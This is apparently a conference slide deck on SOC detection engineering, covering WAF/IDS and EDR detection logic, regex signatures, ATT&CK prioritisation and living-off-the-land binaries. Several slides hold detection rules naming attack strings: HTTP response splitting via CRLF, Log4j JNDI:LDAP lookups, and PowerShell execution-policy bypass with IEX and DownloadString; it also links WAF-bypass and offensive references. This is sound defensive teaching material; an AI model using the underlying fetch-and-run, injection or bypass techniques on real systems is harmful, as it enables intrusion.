1 of 20

Detection Engineering for SOC

Sunil Kumar BV | Sr Security Engineer | Rakuten

“Everything Published, Talked and/or discussed in this conference is solely based on my personal point of view,

and does not represent my current, or past employers.”

2 of 20

Next 40 Mins !

SOC Detection concept
Detection Logic in WAF/ IDS�Workflow�HTTP Header – L7 data fields�Regular expressions�Example
Detection Logic in EDR�detection Focus based on Kill chain and Data collection details�Different OS Binaries�ATT&CK techniques count per Data Source�Example
Q&A

3 of 20

SOC Detections Concept

4 of 20

IDS and WAF Workflow example

Stage 1: Parse HTTP(s) packet from client�(HTTP Request and response logs)

Stage 2 : Chose rule set depending on type of incoming parameters

Packet decode, HTTP Fields

Stage 3: Normalize data �Packet grouping

Stage 4: Apply detection Logics �Regular expression based (signatures/Rules/patterns based)

Stage 5: Make detection decision�alert/offence will be triggered based on true/false/score

5 of 20

HTTP Header (under L7 data)

Layer 7 (or the application layer) is the highest layer in the OSI model of network communication. It's responsible for providing network services to application processes running on a host like web browsers, email clients and file-sharing programs.

Most user-facing protocols and applications like HTTP, FTP and SMTP operate on layer 7.

Not limited to these fields, there will be a greater number of fields available in the IDS/WAF�and Number of different ideologies (scoring etc) will be used by different vendors.

HTTP Related Fields	Files related	Email Related	TCP/UDP DOS related
http-req-cookie	file-data	pop3-req-protocol-payload	tcp-context-free
http-req-headers	file-elf-body	pop3-rsp-protocol-payload	udp-context-free
http-req-message-body	file-flv-body	imap-req-cmd-line
http-req-host-ipv4-address-found	file-html-body	imap-req-first-param	unknown-req-tcp-payload
http-req-host-ipv6-address-found	file-java-body	imap-req-params-after-first-param	unknown-rsp-tcp-payload
http-req-host-header	file-mov-body	imap-req-protocol-payload
http-req-mime-form-data	file-office-content	imap-rsp-protocol-payload	unknown-req-udp-payload
http-req-ms-subdomain	file-pdf-body	email-headers	unknown-rsp-udp-payload
http-req-origin-headers	file-riff-body
http-req-params	file-swf-body
http-req-uri	file-tiff-body
http-req-uri-path	file-unknown-body
http-req-user-agent-header	ftp-req-params
http-rsp-headers	ftp-req-protocol-payload
http-rsp-non-2xx-r	ftp-rsp-protocol-payload
http-rsp-reason	ftp-rsp-banner
http-req-method	ftp-rsp-message

6 of 20

Regular expression…

…..is a sequence of characters that define a search pattern�

IDS and WAF will be using Regex for detection logic (the signatures/Rules/patterns are written)
Easily understandable– Human friendly to read.
Simply “string defined of different syntax and wildcards” which helps in finding sub-string in source text.

Case in-sensitive
Search of Open bracket script
Anything after the string

Most of the Regex in IDS/WAF are written for Signature set of Injections like SQLi, LDAP, Header, Code, OS command and XSS -Cross site Scripting (Nucli scan) etc.�

Attacker are able to find potential ways to Bypass IDS/WAF , these are Bug or "weak places" in regular expressions:

https://github.com/attackercan/regexp-security-cheatsheet and https://www.slideshare.net/slideshow/lie-tomephd2013/21958607#35

ReDos – rule set bypassing
HTTP Parameter Pollution
Double URL Encoded

Mitigation: Precompile regex patterns where possible to improve performance

Use of DAT (Dynamic analysis Tool) for regex checking and fuzzing with created regex patterns which will help in checking of Input validation, limitation , Regex timeout, Resource limits��Ex: https://redosdetector.com/

7 of 20

How can these be used in our Environment:

- Understanding what to detect?

select an adversarial technique to detect –Planning
Proof of concept
Research the underlying technology – Hypothesis creation

- Understanding how to detect?

identify data sources – Data and logs selection
Build the detection – implementation
Correlation with other log sources.

- Peer review (continuous testing and Validation)

- Submit detection into the pipeline (towards Production)

8 of 20

Example on writing these patterns / signature to detect:

sharing the latest attacks details: https://blog.orange.tw/posts/2024-08-confusion-attacks-en /

Confusion Attacks:

Filename Confusion
DocumentRoot Confusion
Handler Confusion

Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

CVE-2023-38709 - Apache HTTP Server: HTTP response splitting

https://bugzilla.redhat.com/show_bug.cgi?id=2273491

Faulty input validation in the core of Apache allows malicious or exploitable backend/content�generators to split HTTP responses,
Acknowledgements: finder: Orange Tsai (@orange_8361) from DEVCORE
CR + LF → Used as a new line character in Windows (Carriage Return + Line Feed - \r\n).

http-req-cookie contains "\r\nContent-Length:” <case-insensitive> AND http-req-URL contains “cURL” <case-insensitive>

9 of 20

Log4J: CVE-2021-44228

It is a RCE vulnerability in Apache Log4j 2.0 through 2.14.1 and

we can achieve this by submitting an exploit string as part of HTTP headers destined for a vulnerable server, then exploit will request a malicious payload from an attacker-controlled server through the Java Naming and Directory Interface (JNDI) over a variety of services, such as Lightweight Directory Access Protocol (LDAP).

POC: https://www.trendmicro.com/ja_jp/devops/22/a/detect-log4j-vulnerabilities.html

Check out for Threat classification:

http://projects.webappsec.org/w/page/13246978/Threat%20Classification

http-req-header == "($?) $JNDI:" OR http-req-header == "($?) $JNDI:LDAP” OR http-req-header contains "($?) $JNDI:LDAP” AND “\b[a-zA-Z0-9-]+\. [a-zA-Z]{2,}\b”

10 of 20

Detection Logic in EDR

- The IOC are going to change easily.

- We should concentrate on Tactics, Techniques and Procedures (TTPs)

How the adversary goes about accomplishing their mission from reconnaissance all the way through data exfiltration and at every step in between

What exactly to look at:

In the example, Technique used is Cred Dump and shown one of the procedure but is it enough or we need to do atomic testing.
What happens when advisory uses new procedure, will our alarms work or not.

11 of 20

Detection Focus (based on Kill chain)

Reconnaissance: attackers scan the environment we can max block IP or segment, but they can change it quickly before the attack.�Weaponization: we cannot catch the attackers here, as they build their payload in their environment where we do not have access/ logs.�Delivery/ Exploitation: these are our vendor address like Firewall and Email gateways �Installation and C2: here we can look on detection engineering activity , once the files ( macro, powershell etc ) from any process or object get in we can check for possible alarming in environment.�Action on Objectives: based on Organizational requirement Fine tuning the detection/ rule set to reduce the FP fatigue or our requirement.�Impact: so that we can catch advisory before potential impact

Data collections:

- Type of Data collected?

- Where is it stored?

- Is it ingested to SIEM, EDR or not?

- Prioritizing data sources based on expenses.

- Gap analysis on Data sources and ingested data.

12 of 20

MITRE Framework

MITRE attack will be overwhelming – �navigator : https://mitre-attack.github.io/attack-navigator/
We need to scope the attack vectors as below:�Basically Filtering based on requirement: �- Filter Platform in layer controls (Linux, win, mac, etc.)

- Then starts look for particular things under selection controls�threat group, data sources

- Select unannotated ( technique/task not applicable) and

- Then toggle the state and hide (eyeball) the rest.��

13 of 20

adversaries leverage Scripts

OS Binaries are local to their OS, but these binaries have been utilized and exploited by cyber criminals and crime groups to camouflage their malicious activity.

we can have look on categories for various OS Binaries:

Windows OS Built in Binaries - Living Off The Land Binaries (LOLBAS Binaries and Scripts) – https://lolbas-project.github.io/api/lolbas.csv�
This file contains every LOLBAS entry in a single file, broken down by LOLBAS file and command
LOLBAS are often Microsoft signed binaries
They can be used for a range of attacks, including executing code, to performing file operations (downloading, uploading, copying, etc).

2. Mac OS Built in Binaries - Living Off the Orchard - https://www.loobins.io/binaries/ LOOBins is a Python SDK and command-line utility for programmatically interact - https://www.loobins.io/docs/api/pyloobins/

Unix OS Built in Binaries - GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems https://gtfobins.github.io/ https://github.com/GTFOBins

server-side exploits - https://sploitify.haxx.it/
Windows/AD environments - https://wadcoms.github.io/

14 of 20

�ATT&CK techniques count per Data Source

We can see Command Execution and Process Creation are top used procedures in TTPs.�

MITRE DeTTECT - The Miter detect framework

Based on this, we can priorities our data collection to address ATT&CK techniques and sub-techniques and collect Sysmon, linux, servers and other logs accordingly...

15 of 20

EDR Fields

These are some of the most used data fields associated with events. Fields that begin with lowercase letters are present in all events.�We have Greater number of Fields from Agents which will collect the data.

timestamp	FilePath
_time	GrandParentImageFilePath
HostID	ParentImageFilePath
event_platform	FileWrittenFlags
event_Name
ComputerName	DetectId
	DetectName
OriginalFilename	DetectDescription
FileName
ImageFileName	CommandLine
GrandParentFileName	ParentCommandLine
BaseFileName	GrandparentCommandLine
TargetFileName
ContextBaseFileName	RegType
	RegistryPath
SHA256HashData	RegNumericValue
DomainName	RegStringValue
HostURL	RegBinaryValue

16 of 20

Ex :- Detecting malicious PowerShell command execution

It is a built-in command line tools and It can download and execute code from another system and provides unprecedented access on Windows computers

Its malicious use is often not stopped or detected by traditional endpoint defenses, as files and commands are not written to disk. This means fewer artifacts to recover for forensic analysis.

Several offensive tools exist that are built on or use PowerShell, including the following: Invoke-mimikatz

POC: https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters

- There can be number of other tuning need to performed based on from which process the command is executed (parent process) and is the parent is legitimate or unknown in string etc.

Condition 1: ((CommandLine contains “powershell.exe –exec” AND CommandLine contains “bypass) AND (CommandLine contains “IEX (” OR CommandLine contains “Invoke-Expression”) AND�CommandLine contains “.DownloadString” AND CommandLine contains “\b[a-zA-Z0-9-]+\. [a-zA-Z]{2,}\b” AND reffererURL contains “\b[a-zA-Z0-9-]+\. [a-zA-Z]{2,}\b”)

17 of 20

Processing Directions:

Step 1 : collecting commands/scripts and its variable details:

Step 2:

Same way we can try for other commands, process like:

nltest ***
net config ***
Run cmd ***

18 of 20

Fine tuning Practices�

- Continuous Improvement and development� use version control to keep and monitor changes.��- Non-Efficient alerts need to be fixed� Update the logic� Added new functionality such as enrichment or correlation

Reviewing alert Periodically�Number of the alert/Offences�Number of FP, Benign TP, TP�Event to alerts time differences�Syslog or EDR agent Fields�Fine tuning Practices

19 of 20

References:

WAF detection logic: https://www.blackhat.com/docs/us-16/materials/us-16-Ivanov-Web-Application-Firewalls-Analysis-Of-Detection-Logic.pdf
Detection Engineers Unveile - Detection engineering https://sansorg.egnyte.com/dl/dHTAZ46hAz
http-headers parameter details: https://docs.paloaltonetworks.com/pan-os/u-v/custom-app-id-and-threat-signatures/custom-application-and-threat-signatures/custom-signature-contexts/string-contexts/http-req-headers
DavidJBianco: https://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
Christopher Peacock - https://scythe.io/library/summiting-the-pyramid-of-pain-the-ttp-pyramid
Malware Analysis For Hedgehogs - https://struppigel.blogspot.com/2017/07/process-injection-info-graphic.html
WAF Bypass - https://owasp.org/www-chapter-frankfurt/assets/slides/21_OWASP_Frankfurt_Stammtisch.pdf

20 of 20

Anybody got any

Questions?